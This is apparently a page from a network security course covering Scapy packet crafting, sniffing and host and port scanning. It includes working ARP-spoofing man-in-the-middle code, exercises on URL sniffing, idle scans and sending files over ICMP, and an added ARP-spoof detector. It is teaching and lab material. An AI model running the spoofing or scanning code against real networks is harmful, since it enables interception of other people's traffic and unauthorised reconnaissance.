215 | P a g e

Scapy

Working with Python, we would use the following:

    from scapy.all import *
    raw(IP())          # the default IP header as bytes (str(IP()) in Python 2)
    a = Ether()/IP(dst="www.google.com")/TCP()/"GET /index.html HTTP/1.1"
    hexdump(a)

Basic commands

    ls()     - list of supported protocols
    ls(IP)   - list of the fields in the protocol packets
    lsc()    - show all Scapy commands

Assembling and sending raw packets requires root access.

Packets

Crafting

    packet = Ether()/IP(dst='8.8.8.8')/TCP(dport=53, flags='S')
    packet.show()            # get the full details of your packet

    p2 = Ether()
    p3 = IP(dst='8.8.8.8/30')
    p4 = TCP(dport=53, flags='S')
    packet = p2/p3/p4

    IP(dst="192.168.10.1-10")/TCP(dport=(0,1024))   # address and port ranges expand into a set of packets

Checking and configuring packets

    pkts = sniff()
    pkts[0].show()
    pkts[0].summary()
    packet = Ether()/IP(dst='8.8.8.8')/TCP(dport=53, flags='S')
    packet.dst          # dst of the first layer (the Ethernet destination)
    packet[IP].dst      # the IP destination

Sending packets

send() sends packets at Layer 3 (Scapy creates the Layer 2 header) without receiving any packets.

    send(IP(dst=['8.8.8.8', '8.8.8.4'])/TCP(dport=53, flags='S'))
    send(IP(dst='8.8.8.8')/TCP(dport=53, flags='S'), count=10)
    send(IP(dst='8.8.8.8')/TCP(dport=53, flags='S'), loop=1)
    answer = sr1(IP(dst="8.8.8.8")/UDP(dport=53)/DNS(qd=DNSQR(qname="cnn.com")))

sendp() sends packets at Layer 2 (you must provide the Layer 2 header) and does not receive any packets.

    sendp(Ether()/IP(dst="1.2.3.4"), iface="eth0")

Send and receive

sr() sends and receives packets at Layer 3.

    sr(IP(dst="192.168.8.1")/TCP(dport=[21,22,23]))
    ans, unans = _        # in the interactive shell, _ holds the last result
    ans.summary()

sr1() sends at Layer 3 and returns only the first answer.

    p = sr1(IP(dst="scanme.nmap.org")/ICMP()/"XXXXXXXXXXX")

srp() sends and receives packets at Layer 2.

    print(srp.__doc__)

Reading packets

    pkts = rdpcap("file.pcap")

Exporting packets

    wrpcap("new.pcap", pkts)
    hexdump(pkts)            # display one or more packets in classic hexdump format
    pktbytes = raw(pkt)      # convert the packet into its raw bytes (str(pkt) in Python 2)
    export_object(pkt)       # base64 encoded
    pkt.psdump()             # dump as PostScript
    pkt.pdfdump()            # dump as PDF

Sniffing with Scapy

With this function we can sniff the traffic.

    sniff(iface="eth0", count=10, filter="icmp")
    sniff()      - sniff network traffic into a packet list (can be saved as PCAP with wrpcap)
    P = sniff()

To view information we will use show():

    P.show()

The filter argument uses BPF syntax, for example:

    filter="tcp and host 64.233.167.99 and port 80"

Monitoring DNS

    from scapy.all import *

    def findDNS(p):
        if p.haslayer(DNS):
            print(p.summary())      # more efficient
            p.display()             # display() prints the packet itself and returns None
            # print(p[IP].src, p[DNS].summary())

    sniff(prn=findDNS)

Creating scanners

    ans, unans = sr(IP(dst="192.168.1.*")/TCP(dport=80, flags="S"))
    # SYN/ACK or RST in response indicates that a machine is up and running.
    ans, unans = sr(IP(dst='192.168.56.99-105')/TCP(dport=80, flags='A'))
    # ACK packets should be answered with RST, which reveals a machine.

UDP scan

Send a UDP packet to the given ports with or without a payload, though a protocol-specific payload makes the scan more effective. Choose a port that is most likely closed (open UDP ports might receive empty packets but ignore them).

ARP scan

    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.56.0/24"), timeout=2)

ICMP scan

    ans, unans = sr(IP(dst="192.168.56.99-110")/ICMP())

ARP

Send ARP requests to determine which hosts are up:

    arping("192.168.230.0/24")      # help(arping)
    ans.summary(lambda s, r: r.sprintf("{IP: %IP.src% is alive}"))

sprintf()

Make your own summary of a packet and abstract lower layers.

    a = IP(dst="192.168.8.1", ttl=12)/UDP(dport=123)
    a.sprintf("The source is %IP.src%")

Port scanner

    syn_packet = IP(dst='192.168.56.102')/TCP(dport=4444, flags='S')
    resp = sr1(syn_packet)
    resp.sprintf('%IP.src% \t %TCP.sport% \t %TCP.flags%')
    # 'SA' flags indicate an open port, 'RA' flags indicate a closed port

ARP spoofing (MiTM)

IP forwarding:

    import os
    os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')   # enable kernel IP forwarding
    os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')   # disable kernel IP forwarding

    send(ARP(op=2, pdst=victimIP, hwdst=victimMAC, psrc=gatewayIP))
    send(ARP(op=2, pdst=gatewayIP, hwdst=gatewayMAC, psrc=victimIP))

Restoring to normal mode (MACsnag is a MAC lookup helper that is not defined on this page and is not part of Scapy):

    victimMAC = MACsnag(victimIP)
    routerMAC = MACsnag(routerIP)
    send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=4)
    send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=4)

Ex:
1. Infect your ARP table and capture the packet using Wireshark.
2. Insert your code into Python and add a loop to send that data every 10 seconds.
3. Create a MiTM attack, and sniff the URLs using urlsnarf.
4. Create URLSnarf and arpspoof.

Scapy Exercise

1. Create a spoofed packet, check on Wireshark.
2. What port does this packet get sent to: send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())
3. Write a script that performs network scanning using ICMP, ARP and SYN scans on a given IP range.
4. Write a script to perform port scanning of a given IP address for ports 1-1024.
5. Send packets to a target IP address and save the packets in a PCAP file.
6. Given a PCAP file, find all the unique hosts in that PCAP file and try to determine their OS.
7. Spoof your OS as Windows XP.
8. What is the difference in the packets between NMAP and SCAPY when using your scanners?
9. Perform a MiTM attack:
10. Check the ARP cache.
11. Capture data.
12. Reset the situation.
13. Create a MiTM IDS.
14. Send a file over ICMP packets.
15. Send a query to DNS and extract your answer.
16. What ARP request does arping send?
17. Extract the live hosts data and save it in a file.
18. Read about the ICMP protocol: what 'code' does a ping use?
19. What port does this packet get sent to: send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP())

Exercise 1 - Network sweeping

Write a script to perform network sweeping, i.e. given an IP address range, find all the machines that are alive. Use any of the host discovery techniques that have been discussed, but ARP tends to be neat and faster on local networks.

Exercise 2 - Port scanning

Write a script to perform port scanning, i.e. given an IP address, find the status of ports on the machine (at least find any open ports under 1024). Use any of the port scanning techniques that have been discussed.

Exercise 3 - IP ID pattern finder

Write a script that takes a target IP and checks for patterns in the IP ID generation. Basic checks include whether the IP IDs generated are all zeros, all constant, randomized, or incremental.

Exercise 4 - IP ID scanner

You might have found a potential 'zombie' in the previous scan. Write a script that takes zombie_ip, victim_ip and victim_port and performs an IP ID scan (details in the notes).

Exercise 5 - Packet hunting

You are given a PCAP 'boston2016'; this PCAP is suspected of having covert channel activity (someone trying to transfer data in packets using unusual methods). Your task is to analyze this packet capture and find the hidden data.

Exercise 6 - Packet analysis

Given a pcap file, find all the unique hosts in that pcap file and try to determine their OS.

Exercise 7 - Dummy network scanner

A client wants you to do a security audit on their network. The client provided you with a network range to scan and a set of IP addresses to exclude from the scan. Before you run an actual network scan, write a script that lists all the IP addresses that fall under the scan (similar to an Nmap list scan), i.e. the network range provided by the client minus the IP addresses to be excluded.

Exercise 8 - Local network interface enumeration

Use a Python library to list all the interfaces on your machine and find as much as you can (interface labels, addressing etc.). When you print the output, make sure it is easily readable.
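The "MiTM IDS" exercise above asks for a detector rather than an attacker. The following is an added example, not code from the course notes: it keeps the first MAC address learned for each IP from ARP replies and raises an alert when the same IP is later claimed by a different MAC, which is exactly the footprint the ARP spoofing section leaves behind. The core logic runs on a constructed list of (sender IP, sender MAC) tuples; the optional watch_live() hook feeds it from Scapy's sniff() with the prn callback pattern used elsewhere on this page (requires Scapy and root; the interface name is an assumption).

```python
"""ARP-spoof detector: alerts when an IP starts answering from a new MAC."""

# Constructed sample of ARP replies (op=2) as (sender IP, sender MAC),
# in the order they would be seen on the wire. From the third record on,
# the gateway's IP is claimed by a second MAC, i.e. a poisoning attempt.
SAMPLE_ARP_REPLIES = [
    ("192.168.56.1",   "aa:bb:cc:00:00:01"),
    ("192.168.56.102", "aa:bb:cc:00:00:02"),
    ("192.168.56.1",   "de:ad:be:ef:00:01"),
    ("192.168.56.1",   "de:ad:be:ef:00:01"),
]


class ArpWatcher:
    """Remembers the first MAC seen per IP and reports later conflicts."""

    def __init__(self):
        self.table = {}    # ip -> MAC first learned
        self.alerts = []   # (ip, known_mac, new_mac)

    def observe(self, ip, mac):
        """Record one ARP reply; return an alert tuple or None."""
        mac = mac.lower()
        known = self.table.get(ip)
        if known is None:
            self.table[ip] = mac
            return None
        if known != mac:
            alert = (ip, known, mac)
            self.alerts.append(alert)
            return alert
        return None


def scan_records(records):
    """Run the watcher over an iterable of (ip, mac) pairs; return all alerts."""
    watcher = ArpWatcher()
    for ip, mac in records:
        watcher.observe(ip, mac)
    return watcher.alerts


def watch_live(iface="eth0", count=0):
    """Live mode (assumed interface name): hook the watcher into Scapy's sniff()."""
    from scapy.all import sniff, ARP   # imported here so the rest runs without Scapy
    watcher = ArpWatcher()

    def on_pkt(p):
        if p.haslayer(ARP) and p[ARP].op == 2:   # only ARP replies ("is-at")
            alert = watcher.observe(p[ARP].psrc, p[ARP].hwsrc)
            if alert:
                print("ALERT: %s was %s, now claimed by %s" % alert)

    sniff(iface=iface, filter="arp", prn=on_pkt, store=0, count=count)


if __name__ == "__main__":
    for alert in scan_records(SAMPLE_ARP_REPLIES):
        print("ALERT: %s was %s, now claimed by %s" % alert)
```

A first-seen table is deliberately simple: on a network where a host legitimately changes its NIC, the watcher will alert once per reply until the table is reset, so a real deployment would seed it from a known-good inventory rather than from whatever answers first.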